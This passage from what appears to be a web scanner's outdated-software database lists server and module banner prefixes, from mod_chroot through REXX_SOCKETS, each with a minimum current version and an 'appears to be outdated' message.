@CURRENT_VER)\"\n\"600445\",\"mod_chroot/\",\"0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600446\",\"mod_clarassl/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600447\",\"mod_clickthru/\",\"0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600448\",\"mod_czech/\",\"3.1.1b2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600449\",\"mod_deflate/\",\"1.0.21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600450\",\"mod_demonstrans/\",\"0.3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600451\",\"mod_dp/\",\"lk.0.20.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600452\",\"mod_dtcl/\",\"mod_dtcl/0.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600453\",\"mod_fastcgi/\",\"2.4.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600454\",\"mod_filter/\",\"1.4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600455\",\"mod_frontpage/\",\"4.0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600456\",\"mod_gzip/\",\"2.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600457\",\"mod_id/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600458\",\"mod_imode/\",\"1.0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600459\",\"mod_index_rss/\",\"1.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600460\",\"mod_interchange/\",\"1.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600461\",\"mod_ipdrop/\",\"0.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600462\",\"mod_ipw/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600463\",\"mod_jk/\",\"1.2.50\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600464\",\"mod_jk2/\",\"2.0.5-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600465\",\"Mod_JServ/\",\"1.1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600466\",\"mod_layout/\",\"4.0.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600467\",\"mod_ldap_userdir/\",\"1.1.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600468\",\"mod_lisp/\",\"2.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600469\",\"mod_log_byte/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600470\",\"mod_log_bytes/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600471\",\"mod_loopback/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600472\",\"mod_macro/\",\"1.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600473\",\"mod_mcrypt/\",\"2.4.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600474\",\"mod_mirror/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600475\",\"mod_mono/\",\"3.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600476\",\"mod_mp3/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600477\",\"mod_mp3idver/\",\"0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600478\",\"mod_mrim/\",\"0.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600479\",\"mod_mundinteractivos/\",\"2.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600480\",\"mod_mya/\",\"3.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600481\",\"mod_mylo/\",\"0.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600482\",\"mod_nsn/\",\"1.0_0-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600483\",\"mod_oas/\",\"5.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600484\",\"Mod_OOiS/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600485\",\"mod_oprocmgr/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600486\",\"mod_pcgi2/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600487\",\"mod_perl/\",\"2.0.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600488\",\"mod_plsql/\",\"11.1.1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600489\",\"mod_pointer/\",\"0.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600490\",\"mod_protection/\",\"0.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600491\",\"mod_psoft_traffic/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600492\",\"mod_pubcookie/\",\"3.3.4a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600493\",\"mod_pubcookie/a5/\",\"1.77.2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600494\",\"mod_python/\",\"3.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600495\",\"mod_random/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600496\",\"mod_rbcban/\",\"2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600497\",\"mod_rdbcookie/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600498\",\"mod_relocate/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600499\",\"mod_repository/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600500\",\"mod_require_host/\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600501\",\"mod_roaming/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600502\",\"mod_rpaf/\",\"0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600503\",\"mod_rsawebagent/\",\"8.0.2[765]\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600504\",\"mod_ruby/\",\"1.3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600505\",\"mod_scgi/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600506\",\"Mod_security/\",\"1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600507\",\"mod_session/\",\"1.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600508\",\"mod_sleep/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600509\",\"mod_snmp/\",\"1.3.6.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600510\",\"mod_spidercache/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600511\",\"mod_ssl/\",\"2.9.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER) (may depend on server version)\"\n\"600512\",\"mod_sugid_files/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600513\",\"mod_survey/\",\"3.0.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600514\",\"mod_suspend/\",\"0.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600515\",\"mod_tagx/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600516\",\"mod_tcl/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600517\",\"mod_text2html/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600518\",\"mod_throttle/\",\"3.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600519\",\"mod_trigger/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600520\",\"mod_tsunami/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600521\",\"mod_uwa/\",\"3.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600522\",\"mod_vdbh/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600523\",\"mod_vhost_ldap/\",\"1.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600524\",\"mod_vhost_mysql/\",\"0.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600525\",\"mod_view/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600526\",\"mod_virgule/\",\"1.41\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600527\",\"mod_virtual/\",\"0.97.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600528\",\"mod_watch/\",\"4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600529\",\"mod_webapp/\",\"1.2.0-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600530\",\"mod_webkit/\",\"0.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600531\",\"mod_webkit2/\",\"0.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600532\",\"mod_websh/\",\"3.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600533\",\"mod_wodan/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600534\",\"mod_xlayout_jh/\",\"0.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600535\",\"mod_xslt/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600536\",\"mod-xslt/\",\"1.3.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600537\",\"ModLayout/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600538\",\"ModNeva/\",\"2.0.b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600539\",\"Monkey/\",\"0.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600540\",\"Mono-XSP Server/\",\"1.0.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600541\",\"Mono-XSPServer/\",\"1.0.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600542\",\"MontaVistaLinux/\",\"2.1UPnP\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600543\",\"MortBay-Jetty-\",\"2.3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600544\",\"MS-MFC-HttpSvr/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600545\",\"MSIWB/\",\"MSIWB/1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600546\",\"MTransit2/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600547\",\"Mya/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600548\",\"MyWebServer/\",\"3.5.71\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600549\",\"NaviServer/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600550\",\"NCSA-CRC+/\",\"1.4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600551\",\"NCSA/\",\"1.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600552\",\"NDCAP/\",\"2.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600553\",\"NeoWebScript/\",\"3.3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600554\",\"NetApp/\",\"7.3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600556\",\"NetApp/build.\",\"RbecksN_000805_0805.000805_0940\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600557\",\"NetCache appliance \\(NetApp/\",\"6.1.1RC1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600558\",\"NetCacheappliance\\(NetApp/\",\"6.1.1RC1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600559\",\"NetEVI/\",\"3.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600560\",\"NetPhantom/\",\"3.61\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600561\",\"NetPresenz/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600562\",\"NetPublisher/\",\"1.10.020\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600563\",\"Netrox-Apache/\",\"1.3.24\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600564\",\"Netscape-Administrator/\",\"3.54\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600565\",\"Netscape-Brew/\",\"6.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600566\",\"Netscape-Commerce/\",\"1.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600567\",\"Netscape-Communications/\",\"1.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600568\",\"Netscape-Enterprise/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600569\",\"Netscape-FastTrack/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600570\",\"Netscape-Proxy/\",\"3.52\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600571\",\"NetWare-Enterprise-Web-Server/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600572\",\"NetZoom\",\"1.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600573\",\"ngd/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600574\",\"mod_wsgi/\",\"4.9.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600575\",\"nginx/\",\"1.24.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600576\",\"Niagara Web Server/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600577\",\"NiagaraWebServer/\",\"3.5.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600578\",\"NIS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600579\",\"Nitix/\",\"4.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600580\",\"Novell-HTTP-Server/\",\"3.1R1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600581\",\"NS_\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600582\",\"Nucleus/\",\"4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600583\",\"NUD/\",\"3.9.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600584\",\"NULLhttpd/\",\"0.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600585\",\"NYSED-A-Series/\",\"2.0X\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600586\",\"OAS/\",\"4.57\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600587\",\"OFIWebServer\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600588\",\"OmniHTTPd/\",\"2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600589\",\"OmniSecure/\",\"3.0a3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600590\",\"Open-Market-Secure-WebServer/\",\"V2.1.\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600591\",\"Open-Market-Secure-WebServerGlobal/\",\"2.0.10.RC0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600592\",\"Open-Market-SecureLink-Bridge/\",\"V2.1.RC0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600593\",\"OpenPKG/\",\"2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600594\",\"OpenSA/\",\"1.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600595\",\"OpenSSL/\",\"3.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). OpenSSL 1.1.1w is current for 1.x and is supported via contract, and 3.0.12 for 3.0.x, and 3.1.4 for 3.1.x.\"\n\"600596\",\"oplweb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600597\",\"Oracle HTTP Server Powered by Apache/\",\"1.3.22\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600598\",\"Oracle_Web_Listener_NT_\",\"2.1.0.3.1/1.20in2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600599\",\"Oracle_Web_Listener/\",\"4.0.8.2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600600\",\"Oracle_Web_listener2.1/\",\"1.20in2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600601\",\"Oracle_Web_listener3.0.2.0.0/\",\"2.14FC1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600602\",\"Oracle_Web_listener3.0/\",\"2.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600603\",\"Oracle_WebDb_Listener/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600604\",\"Oracle-Application-Server-10g/\",\"10.1.3.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600605\",\"Oracle9i Enterprise Edition Release \",\"9.2.0.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600606\",\"Oracle9iAS \",\"(9.0.3.0.0) Containers for J2EE\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600607\",\"Oracle9iAS-Web-Cache/\",\"9.0.4.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600608\",\"Oracle9iAS/\",\"9.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600609\",\"OracleAS-Web-Cache-10g/\",\"10.1.2.3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600610\",\"Orion/\",\"2.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600611\",\"OSDK/\",\"2.0.44\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600612\",\"OSU/\",\"3.10a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600613\",\"OWW/\",\"29.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600614\",\"Pack/\",\"1.0-ea1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600615\",\"PaintChatHTTP/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600616\",\"PasteWSGIServer/\",\"0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600617\",\"Patchy/\",\"1.3.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600618\",\"PBFilter/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600619\",\"PCGI/\",\"2.0a5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600620\",\"Perl/\",\"v5.36.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600621\",\"PersonalNetFinder/\",\"1.0 ID/ACGI\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600622\",\"PEWG/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600623\",\"Phantom/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600624\",\"PHP-CGI/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600625\",\"PHP/\",\"8.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600626\",\"PHP/FI-\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600627\",\"PI/\",\"7.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600628\",\"Pi3Web/\",\"2.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600629\",\"pks_www/\",\"0.9.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600630\",\"plex/\",\"9.5.2a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600631\",\"plexus/\",\"3.0m\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600632\",\"Polycom-WS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600633\",\"Pow Web/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600634\",\"PowerDynamo Personal Web Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600635\",\"PoweredByIISBanner/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600636\",\"PowerWeb/\",\"4.05r5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600637\",\"PowWeb/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600638\",\"Pramati Server/\",\"6.0 SP2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600639\",\"PRINT_SERVER WEB \",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600640\",\"ProfiHost.com/\",\"1.3.28\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600641\",\"Protocol \",\"1.99; Server OpenSSH_2.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600642\",\"proxy_html/\",\"3.1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600644\",\"prxp_solo/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600645\",\"Purveyor / \",\"v1.2 Windows NT\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600646\",\"Purveyor Encrypt Export/\",\"v2.0-1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600647\",\"Purveyor/\",\"v1.3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600648\",\"PWPWEB/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600649\",\"PWS/\",\"8.0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600650\",\"PWSERV-\",\"65\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600651\",\"PyApache/\",\"4.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600652\",\"Python/\",\"3.13.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600653\",\"QTSS/\",\"6.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600654\",\"QuantumCorporation./\",\"3.4.790\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600655\",\"query/\",\"1.16.83\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600656\",\"Quid Pro Quo/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600657\",\"QuidProQuo/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600658\",\"RAID HTTP Server/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600659\",\"RAIDHTTPServer/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600660\",\"Rapid Logic/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600661\",\"RapidLogic/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600662\",\"Rapidsite/Apa/\",\"1.3.33\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600663\",\"RAQdevil/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600664\",\"Rational_Web_Platform/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600665\",\"RCS/\",\"3000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600666\",\"RealVNC/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600667\",\"Red-Hat-Secure/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600668\",\"RedHat/\",\"3022\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600669\",\"RedirServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600670\",\"Redline Networks Accelerator \",\"2.3.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600671\",\"REMTEK/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600672\",\"RENSRV/v\",\"8.43\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600673\",\"Replicon Web Time Sheet/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600674\",\"RepliconWebTimeSheet/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600675\",\"Replique/v\",\"0.2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600676\",\"Report Server/\",\"3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600677\",\"Resin/\",\"4.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600678\",\"rewrit/\",\"1.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600679\",\"rewrite/\",\"3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600680\",\"Rex/\",\"12.0.7601.17514\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600681\",\"REXX_SOCKETS/\",\"3.01\",\"@RUNNING_VER appears to be outdated (current is at least 